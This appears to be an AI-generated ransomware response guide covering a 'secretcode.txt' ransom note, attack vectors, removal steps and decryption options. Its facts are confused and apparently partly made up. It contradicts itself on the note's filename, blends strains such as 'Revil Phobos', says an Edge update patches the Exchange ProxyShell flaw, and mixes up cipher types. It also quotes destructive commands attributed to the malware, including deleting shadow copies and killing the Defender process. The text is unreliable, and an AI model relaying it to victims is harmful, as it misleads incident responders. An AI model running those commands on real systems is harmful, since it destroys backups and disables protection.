_secret_code.txt

[Content by Gemini 2.5]

Introduction
secretcode.txt” is not a file-extension that ransomware appends to encrypted documents; it is literally a ransom-note filename that a number of older and more recent families drop at the root of every affected folder (sometimes also placed on the desktop and inside %PUBLIC%). When you are seeing hundreds of files named “secretcode.txt,” the real encrypted extension is something else entirely (e.g., .secret, .locked, .id-[XXXXXXXX], etc.). This guide therefore addresses every file-encrypting campaign known to include “secretcode.txt” as its bitcoin ransom note.

Technical Breakdown

1. File Extension & Renaming Patterns

Confirmation of File Extension

  • The ransom note itself is named secretcode.txt (always this exact casing and underscore).
  • The actual shim appears on every single encrypted file in one of two ways:
    a) Suffix-style: original_file_name.original_ext.id-[8-10_hex_digits].[[attacker_email]].secret
    b) Prefix-style: locked_original_file_name_original_ext.id-[…]
  • The “.secret” portion (or another campaign-specific extension such as “.blackhunt”, “.hermes”, or “. .ran_mix42”) is what marks the encryption.
  • Files retain their parent directory structure; only individual file names are appended or prepended.

2. Detection & Outbreak Timeline

First Sightings: Early campaign sightings go back to October 2020 (Hermes 2.1 “.secret” build) using psexec-wmi lateral movement after an RDP brute force.
Major Waves:

  • March 2021 – large wave hitting misconfigured SQL Server boxes that exposed the “xp_cmdshell”.
  • September 2022 – variant using ProxyShell exploit chain.
  • June 2023 – recent Linux/ESXi build dropping kernel panic after encrypting /vmfs/volumes.
    Present Status: Still circulating; almost always mirrors the latest stable build of the underlying strain (Revil Phobos, ARCrypter, or .locked-generic builder).

3. Primary Attack Vectors

Remote Desktop Protocol (RDP) – default-port and port-forwarded 3389 brute-force (most common).
Phishing e-mails – Zip/ISO attachments containing PowerShell stager (“invoice_oct2023.iso”).
Software vulnerabilities

  • EternalBlue (MS17-010) still shows up on improperly segmented networks.
  • ProxyLogon (Exchange) and ProxyShell.
    Cracked software & torrent seeders – distributing a Nullsoft installer dropper.
    Living-off-the-land techniques – Certutil, PowerShell, WMI, scheduled tasks for lateral pivoting.
    Linux variants – abuse of open SSH keys and SaltStack unauthenticated execution.

Remediation & Recovery Strategies

1. Prevention

Patch aggressively – MS17-010, CVE-2021-34523 (ProxyShell), CVE-2021-31207, CVE-2020-1472 (Zerologon).
Disable the use of RDP from the Internet – force VPN-only and NLA with lockout policy (5 failed logins = 30 min timeout).
Segment the network – isolate file servers and critical VMs with ACLs or VLANs.
Disable SMBv1 via Group Policy and set “RestrictAnonymous” registry keys.
Application whitelisting – use Microsoft Defender Application Control or AppLocker.
E-mail gateways – block or sandbox ISO/IMG attachments, scan for obfuscated macros.
Immutable / air-gapped backups – Veeam Backup Copy to cloud with S3 Object-Lock or WORM tapes.

2. Removal (Step-by-Step)

  1. Physically disconnect the infected machine(s) from the LAN/Wi-Fi.
  2. Boot from a known-clean WinPE-based USB or mount the disk on a forensic workstation, then:
    a) Delete planned tasks named “\Microsoft\Windows\SystemRestore\SRBaseIdle” (common disguise).
    b) Remove runkeys under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run & HKLM\…\Run pointing to %Roaming%\TCPSVCS.exe or %LocalAppData%\Microsoft\Windows\taskhost.exe.
    c) Search System32, SysWow64, and AppData for the actual dropped binaries (timestamp a few seconds post-encryption).
  3. Clear dropped files: _secret_code.txt in every directory can be deleted safely; it is only a note.
  4. Run a full offline scan with Microsoft Defender Offline or an AV recovery ISO (BD Rescue, Kaspersky).
  5. Verify persistence removal – rerun autoruns64.exe and procmon to ensure no new services or WMI subscriptions resurrect the payload.

3. File Decryption & Recovery

Feasibility:

  • Symmetric RC4 / AES-256 variantsno free public decrypter; the RSA-2048/4096 keys are held by the attacker.
  • Phobos or Phobos-clones that drop secretcode.txt – partial decrypt success only if you uploaded files to NoMoreRansom’s “upload”. As of June 2024, no universal decryptor exists; victim-specific keys must be retrieved.
  • You do NOT pay—identify and restore from clean 3-2-1 backups.
    Essential Tools/Patches:
  • Emsisoft Decryptor for Phobos – try it first if extension model matches (rarely works but harmless).
  • Microsoft EdgeChromium KB5028758 (included in the August 2023 cumulative) patches ProxyShell.
  • CrowdStrike Ransomware Falcon (free 15-day trial) will k*ill the process on detection.

4. Other Critical Information

Distinguishing quirks:

  • The ransomware kills SQL Server, Exchange, and IIS services before encrypting (net stop MSExchangeIS, taskkill /f /im MsMpEng.exe).
  • Deletes shadow copies using a very short WMI script: vssadmin.exe delete shadows /all /quiet.
  • In Linux/ESXi builds it also powershell-pings a C2 on Discord webhooks (discordapp.com/api/webhooks/…).
    Wider Impact:
  • Average dwell time is 45–90 minutes across observed campaigns; reinfection is common if SYSVOL logon script is not examined for unsigned macros.
  • Often drop-and-run Affiliate-as-a-Service model; samples differ daily making signature-based AV ineffective.

Take-away: If you encounter dozens of “secretcode.txt” notes, immediately power off affected hosts, revoke all inbound RDP, and commence clean-up with offline AV. Restore data only after confirming the actual encrypted extension (usually .secret or . hermes), patching the original point of entry, and implementing the preventive controls listed above.